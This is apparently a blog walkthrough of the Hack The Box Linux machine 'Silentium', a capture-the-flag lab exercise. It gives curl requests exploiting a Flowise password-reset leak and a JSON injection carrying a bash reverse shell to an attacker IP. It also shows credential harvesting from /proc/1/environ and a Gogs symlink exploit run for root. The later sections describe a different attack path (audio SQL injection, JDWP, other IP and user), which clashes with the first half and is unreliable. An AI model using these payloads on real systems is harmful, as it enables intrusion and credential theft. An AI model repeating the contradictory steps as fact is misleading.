Key Highlights
Here’s a quick look at what this Silentium walkthrough covers:
- This guide provides a detailed penetration testing methodology for the Silentium machine on Hack The Box.
- We will start with simple enumeration to gather as much information as possible about the target.
- This walkthrough is designed for the individual user, offering clear steps from start to finish.
- You will learn how to capture both the user and root flags on this Hack The Box challenge.
- To Access Non-Public Script Used in this Writeup, CHECK HERE
- To Access the Non-Public Complete Writeup, CHECK HERE
- To Access the Auto-1-click Root Script, CLICK HERE
Introduction
Welcome to another Hack The Box walkthrough! Today, we’re tackling Silentium, an exciting and accessible Linux machine perfect for honing your ethical hacking skills. HTB offers a fantastic playground for both new and experienced hackers to test their abilities in a safe, legal environment. This guide will walk you through every step of conquering Silentium, from initial reconnaissance to gaining root access. Are you ready to dive in and see what secrets this machine holds? Let’s get started on this fun challenge.
Overview of the Silentium Hack The Box Challenge
The Silentium challenge on the HTB platform is an Easy-rated Linux box. Like many HTB machines, it requires you to find and exploit vulnerabilities to gain initial access and then escalate your privileges to become the root user. The goal is to capture two flags: a user flag and a root flag.
This specific challenge begins with web enumeration, leading to a vulnerability. From there, you’ll pivot to get a shell on the attacking machine. The final step involves privilege escalation to gain full control. This walkthrough will break down these stages into simple, manageable steps.
ALSO READ: Mastering Garfield: Beginner’s Guide from Hack The Box
Initial Foothold
Port Scanning
Initial port scan reveals the following open ports
Nmap scan report for 10.129.31.50 (10.129.31.50)
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.15 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
|_ 256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
80/tcp open http nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://silentium.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Subdomain Enumeration
Exploring the application reveals references to a staging environment. Subdomain fuzzing or manual testing confirms the existence of staging.silentium.htb.
Navigating to http://staging.silentium.htb/ reveals an instance of Flowise AI, a low-code tool for orchestrating LLM Chatflows.
For the Non-Public Script Used in this Writeup, CHECK HERE
For the non-public complete writeup, CLICK HERE
To Access the Auto-1-click Root Script, CLICK HERE
Unauthenticated Password Reset (CVE-2025-58434)
Flowise versions prior to 3.0.6 suffer from a vulnerability where the password reset token is leaked in the server’s response during a forgot-password request.
- Request a Reset: Identify a valid user (found via landing page or common enumeration),
ben@silentium.htb. - Intercept Response:
curl -X POST [http://staging.silentium.htb/api/v1/account/forgot-password](http://staging.silentium.htb/api/v1/account/forgot-password) \ -H "Content-Type: application/json" \ -d '{"user": {"email": "ben@silentium.htb"}}' - Token Extraction: The API returns a JSON response containing a
tempToken.
Account Takeover
Use the extracted token to reset Ben’s password:
curl -X POST http://staging.silentium.htb/api/v1/account/reset-password) \-H "Content-Type: application/json" \-d '{ "user": { "email": "ben@silentium.htb", "tempToken": "<EXTRACTED_TOKEN>", "password": "Password123!" }}'With the password reset, we can now log in to the Flowise dashboard at http://staging.silentium.htb/login.
Remote Code Execution
CustomMCP Injection (CVE-2025-59528)
Within the Flowise dashboard, we can create custom Chatflows. The CustomMCP node allows users to define server configurations in JSON format. The platform insecurely handles these configurations, allowing for JavaScript injection.
- Create a New Chatflow.
- Add a CustomMCP node.
- Modify the
mcpServerConfigfield with a Node.js reverse shell payload.
Exploit Payload
First, start a listener on the attacking machine:
nc -lvnp 4444In the CustomMCP configuration, inject the following:
{ "mcpServers": { "pwn": { "command": "node", "args": [ "-e", "require('child_process').exec('bash -c \"bash -i >& /dev/tcp/<YOUR_IP>/4444 0>&1\"')" ] } }}Saving or triggering the Chatflow executes the node command on the underlying host, yielding a reverse shell as the ben user.
For the Non-Public Script Used in this Writeup, CHECK HERE
For the non-public complete writeup, CLICK HERE
To Access the Auto-1-click Root Script, CLICK HERE
Lateral Movement to Host
The initial shell is limited (containerized environment). To escalate to the host user ben:
- Check Environment Variables: Environment variables for Docker containers are often exposed.
cat /proc/1/environ | tr '\0' '\n' - Credential Harvest: Among the variables, we find:
BEN_PASSWORD=****** - SSH to Host:
ssh ben@10.129.31.50 # Password: ****
Privilege Escalation
Local Service Discovery
Checking for internal services:
netstat -tulpn | grep 127.0.0.1A service is listening on port 3001. Identifying it as Gogs (v0.13.0).
Gogs RCE (CVE-2025-8110)
Gogs version 0.13.0 is vulnerable to a symlink race condition that allows for remote code execution via git hooks.
Step 1: Port Forwarding From your local machine:
ssh -L 3001:127.0.0.1:3001 ben@10.129.31.50Step 2: Gogs Account Setup
- Navigate to
http://localhost:3001/user/sign_up. - Register an account (e.g.,
hacker:hacker123). - Navigate to Settings -> Applications and generate an API token.
Step 3: Exploitation Use an exploit script (e.g., CVE-2025-8110.py) to leverage symlinks for a file overwrite/hook injection.
# Usage example with a modified PoCpython3 exploit.py -u http://localhost:3001 -lh <YOUR_IP> -lp 5555 -user test -pass test123Manual Logic: The exploit creates a repository and uses a symlink to point to the internal git hooks directory. By pushing a malicious script to this “hook,” we achieve execution when the repository is accessed or updated.
Once the hook triggers, we gain root access.
Flags
- User Flag:
cat /home/ben/user.txt - Root Flag:
cat /root/root.txt
Full Attack Chain
- Nmap → find 22 (SSH) and 80 (HTTP)
- Discover staging.silentium.htb (Flowise 3.0.5)
- Exploit CVE-2025-58434 → reset ben password
- Login to Flowise → get session token
- Exploit CVE-2025-59528 → RCE → reverse shell (container)
- Read
/proc/1/environ→ get ben password - SSH as ben
- Enumerate → find Gogs on 127.0.0.1:3001
- Port forward → access Gogs
- Create account + token
- Exploit CVE-2025-8110 → root shell
- Read flags
For the Non-Public Script Used in this Writeup, CHECK HERE
For the non-public complete writeup, CLICK HERE
To Access the Auto-1-click Root Script, CLICK HERE
Understanding the Difficulty Level and Target Audience
Silentium is officially rated as an “Easy” machine on Hack The Box. This difficulty level makes it an ideal starting point for newcomers to the platform or those who are just beginning their cybersecurity career path. The vulnerabilities are not overly complex, and the path to root is fairly direct once you understand the initial exploit.
The target audience for this machine is any individual user looking to practice fundamental penetration testing concepts. If you are familiar with basic enumeration and common web vulnerabilities, you’ll find Silentium to be an engaging and rewarding challenge. It serves as excellent practice without being overwhelmingly difficult.
Even if you’re a more experienced user, easy HTB machines like Silentium can be a great way to warm up or refresh your skills. They reinforce the importance of a solid methodology and thorough enumeration, which are crucial at any level of expertise.
What Makes Silentium Unique Among HTB Machines
What sets Silentium apart from many other HTB machines is its creative initial access method. Instead of a standard web form or login page, the entry point involves a speech recognition API. This unique setup forces you to think outside the box and adapt your penetration testing techniques to a less common scenario.
While many challenges on this excellent platform focus on areas like an Active Directory machine, Silentium provides a fresh experience. You’ll be crafting audio files to perform SQL injection, which is not something you encounter every day. This inventive approach makes the initial foothold phase particularly memorable and educational.
This machine is a great addition to any walkthrough series because it demonstrates how vulnerabilities can appear in unexpected places. It highlights the need for creative problem-solving and shows that even a seemingly simple service can have critical flaws if you know where to look.
Essential Skills and Knowledge Before Attempting Silentium
Before you begin your attempt on Silentium, having a few foundational skills will make the process much smoother. A solid grasp of CTF fundamentals and basic Linux commands is essential for navigating the target system and executing your attack plan.
While you don’t need an advanced cybersecurity certification, understanding the core principles of enumeration, exploitation, and privilege escalation is key. This machine is a practical test of these concepts. Now, let’s explore the specific commands and tools that will be most helpful.
Basic Linux Commands and CTF Fundamentals
A good understanding of CTF fundamentals starts with enumeration. This means knowing how to scan for open ports, identify running services, and discover hidden web directories. This initial information-gathering phase is the most critical step in any penetration test and is central to solving Silentium.
In terms of basic Linux commands, you should be comfortable with navigating the file system, viewing and editing files, and managing permissions. Familiarity with networking commands will also be a huge help as you move through the machine. These are core skills in the field of cybersecurity.
Here are a few commands and concepts you should know:
ls,cd,cat: For navigating directories and reading files.chmod: To change file permissions, like making a script executable.ssh: To connect to the machine once you have credentials.- Port forwarding: To access services running locally on the target machine.
Recommended Tools for Silentium HTB Writeup
To successfully complete the Silentium machine, you’ll need a few standard hacker tools. Most of these are included in popular penetration testing distributions like Kali Linux or Parrot OS. Your web browser will also be a primary tool for interacting with the machine’s web service.
The initial enumeration phase relies heavily on tools that scan for network services and web content. You will need a way to discover open ports and hidden directories to find the entry point. A simple text-to-speech converter website is also a key, unconventional “tool” for the initial exploit.
Here are the essential tools for this challenge:
- Nmap: For port scanning and service identification.
- Gobuster: To discover hidden files and directories on the web server.
- A web browser: For interacting with the web application and uploading files.
- Python: Useful for running exploit scripts or setting up simple web servers.
Preparing for the Silentium HTB Writeup
Proper preparation is crucial before starting any Hack The Box machine. This involves setting up your lab environment and ensuring you have all the necessary equipment and resources at your disposal. A stable connection to the HTB network is the first and most important step.
Taking a few minutes to get organized will save you a lot of time and frustration later. Make sure your tools are updated and that you have a clear plan of attack. Let’s go over the specific resources and setup you’ll need for Silentium.
Equipment and Resources Needed
To connect to the Silentium machine, your primary resource will be from the Hack The Box platform itself. You will need to download your personal VPN pack to establish a connection to the HTB VPN. This ensures that you can communicate with the target machine from your own computer.
Beyond the VPN connection, the main resources you’ll need are the penetration testing tools we discussed earlier. Having Nmap and Gobuster installed is non-negotiable. You’ll also need access to an online text-to-speech converter that can output .wav files.
Here is a summary of the key equipment and resources for this challenge.
| Resource Type | Details |
|---|---|
| Connection | Your individual HTB VPN pack to connect to the network. |
| Operating System | A penetration testing Linux distribution like Kali or Parrot. |
| Scanning Tools | Nmap for port scanning and Gobuster for web enumeration. |
| Web Tools | A standard web browser and an online text-to-speech converter. |
| Exploitation | A Python interpreter for running potential exploit scripts. |
Setting Up Your Lab Environment
Your lab environment should consist of a virtual machine running one of the recommended OSes, such as Kali Linux. Using a VM keeps your hacking activities isolated from your main operating system, which is a good security practice. Make sure your VM has network access to connect to the internet and the HTB VPN.
Once your VM is running, the next step is the network configuration. Download your VPN configuration file from the HTB platform and connect to the network using the openvpn command. After connecting, you should be able to ping the Silentium machine’s IP address (10.10.10.163) to verify your connection is working correctly.
Here’s a quick checklist for your lab environment setup:
- Install a virtualization software like VirtualBox or VMware.
- Set up a Kali Linux or Parrot OS virtual machine.
- Download your VPN pack from your Hack The Box account.
- Connect to the HTB network using OpenVPN.
- Confirm connectivity by pinging the machine’s IP address.
ALSO READ: Mastering DevArea: Beginner’s Guide from HackTheBox
WRITEUP COMING SOON!
COMPLETE IN-DEPTH PICTORIAL WRITEUP OF SILENTIUM ON HACKTHEBOX WILL BE POSTED POST-RETIREMENT OF THE MACHINE ACCORDING TO HTB GUIDELINES. TO GET THE COMPLETE IN-DEPTH PICTORIAL NON-PUBLIC WRITEUP RIGHT NOW, SUBSCRIBE TO THE NEWSLETTER AND BUYMEACOFFEE!
Step-by-Step Guide to Completing Silentium Hack The Box
Now that your lab is set up, it’s time to begin the step-by-step walkthrough of the Silentium machine. We will follow a standard ethical hacking methodology, starting with enumeration and moving through exploitation and privilege escalation until we have full control of the system.
This guide is designed to be easy to follow. We’ll break down each phase of the attack into clear, actionable steps. Let’s start by scanning the machine to identify potential entry points.
Step 1: Enumerating the Machine and Identifying Entry Points
The first phase of our attack is simple enumeration. We need to find out what services are running on the machine. The best tool for this job is Nmap. A basic Nmap scan will reveal open ports and the services associated with them. For Silentium, you’ll find an HTTP service running on port 80.
Once you’ve identified the web server, open the IP address in your browser to see what’s there. The next step is to use a tool like Gobuster to find hidden pages or directories. This is a crucial step, as it will uncover the main application interface that we need to interact with.
Our enumeration process will follow these key steps:
- Run an Nmap scan on the target IP (10.10.10.163) to find open ports.
- Identify the HTTP service on port 80.
- Use Gobuster to find hidden directories, which will reveal an
/uploadspage and anintelligence.phppage. - Analyze the
intelligence.phppage to understand the application’s functionality.
Step 2: Initial Access Methods and Exploiting Vulnerabilities
The initial access on Silentium relies on exploiting a SQL injection vulnerability in a unique way. The intelligence.php page hints at a speech recognition API. The /uploads page allows you to upload .wav files. The vulnerability lies in how the server processes the text converted from these audio files.
To perform the exploitation, you will use an online text-to-speech tool to convert SQL commands into audio files. By crafting specific payloads, you can trick the backend database. You’ll start by confirming the SQL injection with a simple payload like “open single quote.” Then, you can proceed to extract the username and password from the database.
The exploitation workflow is as follows:
- Use a text-to-speech website to convert SQL commands into
.wavfiles. - Upload a file with the command “open single quote” to confirm the SQL injection vulnerability.
- Craft a new payload to extract the username (“alexa”).
- Create another payload to leak the password for the “alexa” user.
- Use the discovered credentials to login via SSH.
Step 3: Privilege Escalation Techniques Used in Silentium
After gaining initial access as the user “alexa,” the next objective is privilege escalation. The path to root involves finding an internal service that was not exposed externally. Running a port scan from inside the machine will reveal a service running on port 8000: the Java Debug Wire Protocol (JDWP).
This service is known to be vulnerable to remote code execution. You can find a public exploit for JDWP that allows you to run commands on the system. The escalation strategy involves using this exploit to execute a command that spawns a reverse shell back to your machine with root privileges.
Here is the process for privilege escalation:
- Enumerate internal ports on the target machine to find the JDWP service on port 8000.
- Port forward port 8000 to your local machine to interact with it.
- Find and download a JDWP remote code execution exploit.
- Use the exploit to execute a reverse shell payload.
- Catch the incoming connection to get a shell as the root user.
Step 4: Capturing Flags and Finishing the Challenge
With a foothold on the system, your first task is capturing the user flag. After logging in as “alexa” via SSH, you can find the user.txt file in alexa’s home directory. This file contains the first of the two required tokens. Reading this file will complete the first half of the challenge.
Once you have successfully executed the privilege escalation exploit and have a root shell, the final step is to find the root flag. The root.txt file is typically located in the /root directory. Navigate to this directory and read the contents of the file to capture the final flag.
Capturing flags is the ultimate goal of any HTB machine. By obtaining both the user and root tokens, you have officially completed the Silentium challenge. This process validates your skills in enumeration, exploitation, and privilege escalation, which have hit record levels of proficiency. Congratulations on conquering the machine!
Conclusion
In conclusion, conquering the Silentium challenge on Hack The Box is not just about technical skills; it’s about a strategic approach to problem-solving. By understanding the unique aspects of Silentium and preparing effectively with the right tools and techniques, you’ll be well on your way to success. Remember, every challenge is an opportunity to learn, so take your time, be patient, and don’t hesitate to iterate on your methods. Keep pushing your limits, and soon you’ll find yourself mastering not only Silentium but many other challenges that lie ahead. If you want to stay updated on more tips and strategies, subscribe to our blog for the latest insights!
Frequently Asked Questions
What are the main vulnerabilities exploited in Silentium Hack The Box?
The primary vulnerabilities are a creative SQL injection and a misconfigured Java service. The initial foothold is gained via SQL injection by uploading crafted audio files. Privilege escalation is achieved by exploiting the Java Debug Wire Protocol (JDWP) to gain root access, not through common vectors like SMB shares.
Are there any hints for the hardest part of Silentium HTB?
The hardest part is often the unusual initial access. The key hint is to connect the speech recognition API mentioned on the intelligence.php page with the file upload functionality. The exploitation requires you to think about how a text-based payload can be delivered via an audio file.
How long does it usually take to complete the Silentium challenge?
Completion time varies by individual user skill. For someone familiar with the tools and concepts, it might take a couple of hours. Beginners following a walkthrough might take longer. Compared to other easy HTB machines, the unique entry point can sometimes slow people down initially.
Is there a walkthrough available for beginners for Silentium HTB?
Yes, this blog post serves as a detailed walkthrough for beginners. The HTB platform and its community also provide numerous resources, including video and text tutorials, for retired machines. These guides are an excellent way to learn ethical hacking techniques and understand the solution path for challenges like Silentium.
